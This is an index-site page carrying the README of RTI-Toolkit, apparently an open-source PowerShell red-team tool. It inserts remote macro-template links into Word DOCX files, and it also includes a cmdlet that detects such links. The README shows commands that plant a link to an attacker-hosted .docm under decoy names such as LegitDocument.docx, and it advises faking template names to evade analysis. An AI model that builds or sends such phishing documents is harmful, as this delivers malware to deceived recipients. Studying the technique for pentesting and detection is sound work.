Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/nickvourd/rti-toolkit
Remote Template Injection Toolkit
https://github.com/nickvourd/rti-toolkit
initial-access macros microsoft offensive-security pentest-tool pentesting phishing phishing-attacks phishing-detection phishing-kit powershell powershell-module powershell-script redteam redteam-tools redteaming remote-template remote-template-injection windows
Last synced: 2 months ago
JSON representation
Remote Template Injection Toolkit
- Host: GitHub
- URL: https://github.com/nickvourd/rti-toolkit
- Owner: nickvourd
- License: mit
- Created: 2023-08-12T10:55:31.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-04-07T13:18:41.000Z (10 months ago)
- Last Synced: 2024-04-07T20:47:21.851Z (10 months ago)
- Topics: initial-access, macros, microsoft, offensive-security, pentest-tool, pentesting, phishing, phishing-attacks, phishing-detection, phishing-kit, powershell, powershell-module, powershell-script, redteam, redteam-tools, redteaming, remote-template, remote-template-injection, windows
- Language: PowerShell
- Homepage:
- Size: 1.88 MB
- Stars: 23
- Watchers: 2
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# RTI-Toolkit
Remote Template Injection Toolkit
## Description
RTI-Toolkit is an open-source PowerShell toolkit for Remote Template Injection attack. This toolkit includes a PowerShell script named `PS-Templator.ps1` which can be used from both an attacking and defensive perspective.
The following tables presents the main modules (cmdlets) of `PS-Templator.ps1`:
| Cmdlet | Description | Prespective |
| -------|:-----------:|:-----------:|
| [Invoke-Template](#invoke-template) | Implements remote template links within default Office Word templates | Attacking |
| [Invoke-Regular](#invoke-regular) | Implements remote template links within regular Office Word documents without template | Attacking |
| [Invoke-Identify](#invoke-identify) | Indentifies remote template links within Office Word docx documents with/without template | Defensive |
⚠️ `PS-Templator.ps1` supports only DOCX files.
## Version
### 1.0.0
## License
This tool is licensed under the [](LICENSE).
## Acknowledgement
Special thanks to my friends [@Papadope9](https://twitter.com/Papadope9) and [Stavros Gkounis (a.k.a purpl3ph03n1x)](https://www.linkedin.com/in/stavros-gkounis-603026a6/), who provided invaluable assistance during the beta testing phase of the tool.
This tool was inspired during an iCAST Red Teaming Assessment with [@S1ckB0y1337](https://twitter.com/S1ckB0y1337) a few years ago.
Supernova was created with ❤️ by [@nickvourd](https://twitter.com/nickvourd).
## Table of Contents
- [RTI-Toolkit](#rti-toolkit)
- [Description](#description)
- [Version](#version)
- [License](#license)
- [Acknowledgement](#acknowledgement)
- [Table of Contents](#table-of-contents)
- [Remote Template Injection (RTI)](#remote-template-injection-rti)
- [Installation](#installation)
- [Cmdlets](#cmdlets)
- [Invoke-Template](#invoke-template)
- [Invoke-Template Example](#invoke-template-example)
- [Invoke-Regular](#invoke-regular)
- [Invoke-Regular Example](#invoke-regular-example)
- [Invoke-Regular Example 2](#invoke-regular-example-2)
- [Invoke-Identify](#invoke-identify)
- [Invoke-Identify Example](#invoke-identify-example)
- [Invoke-Identify Example 2](#invoke-identify-example-2)
- [References](#references)
## Remote Template Injection (RTI)
Remote Template Injection (RTI) in the context of Microsoft Office refers to a specific type of security vulnerability that can be exploited through malicious templates in Office documents (e.g., Word, Excel, PowerPoint).
For example, in a DOCX file, the content is stored in XML format within the archive, and some of these XML files may reference external resources or templates. Attackers can indeed manipulate these XML files to insert malicious links or content that can potentially exploit vulnerabilities or deceive users.
This is a Macro-Based attack.
## Installation
To load `PS-Templator.ps1` as a module into memory, run the following command:
```
Import-Module .\PS-Templator.ps1
```
:information_source: `PS-Templator.ps1` works without the necessity of installing any additional dependencies.
:information_source: `PS-Templator.ps1` works as PowerShell module.
:information_source: `PS-Templator.ps1` tested on Windows 10 machine with Office 2019 Professional plus.
## Cmdlets
### Invoke-Template
`Invoke-Template` is a cmdlet that implements remote template links within default Office Word templates.
#### Invoke-Template Example
Assuming that you have a default Word template, one like them:
Saved as, for example, 'Name.docx':
If you use `Invoke-Template` cmdlet you can insert a malicious link within this docx:
⚠️ Before running `Invoke-Template`, please make sure to save the document and close it (terminate its process).
```
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx
```
Outcome:
As you can see, the Invoke-Template module keeps a backup of the original document and provides the full path to the malicious document.
From debugging prespective, if you connvert the malicious docx to zip archive and go into /word/_rels/settings.xml.rels, you can see the malicious link:
### Invoke-Regular
`Invoke-Regular` is a cmdlet that implements remote template links within default Office Word documents without templates.
#### Invoke-Regular Example
Assuming that you have a default Word document without a template, like this:
Saved as, for example, 'Doc1.docx':
If you use `Invoke-Regular` cmdlet you can insert a malicious link within this docx:
⚠️ Before running `Invoke-Regular`, please make sure to save the document and close it (terminate its process).
```
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx
```
Outcome:
As you can see, the Invoke-Regular module keeps a backup of the original document and provides the full path to the malicious document.
From debugging prespective, if you connvert the malicious docx to zip archive and go into /word/_rels/settings.xml.rels, you can see the malicious link:
#### Invoke-Regular Example 2
From an OPSEC perspective, you can use `-TemplateName` in conjunction with the `Invoke-Regular` module. This will make your malicious document appear more legitimate if someone try to analyze it.
Here is an example:
```
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx
```
Outcome:
From debugging prespective, if you connvert the malicious docx to zip archive and go into /docProps/app.xml, you can see the fake template name:
### Invoke-Identify
`Invoke-identify` is a cmdlet that indentifies remote template links within Office Word docx documents with/without template.
#### Invoke-Identify Example
Assuming that you have a malicious Word document:
```
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt
```
Outcome:
#### Invoke-Identify Example 2
Assuming that you have a non-malicious Word document:
```
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt
```
Outcome:
## References
- [ired.team](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros)
- [dmcxblue.gitbook.io](https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1221-template-injection)
- [john-woodman.com](https://john-woodman.com/research/vba-macro-remote-template-injection/)
- [remoteInjector GitHub by John Woodman](https://github.com/JohnWoodman/remoteInjector)
- [Invoke-Templator GitHub by Outflanknl](https://github.com/outflanknl/Invoke-Templator)
- [attack.mitre.org](https://attack.mitre.org/techniques/T1221/)
- [BadAssMacros GitHub by Inf0secRabbit](https://github.com/Inf0secRabbit/BadAssMacros)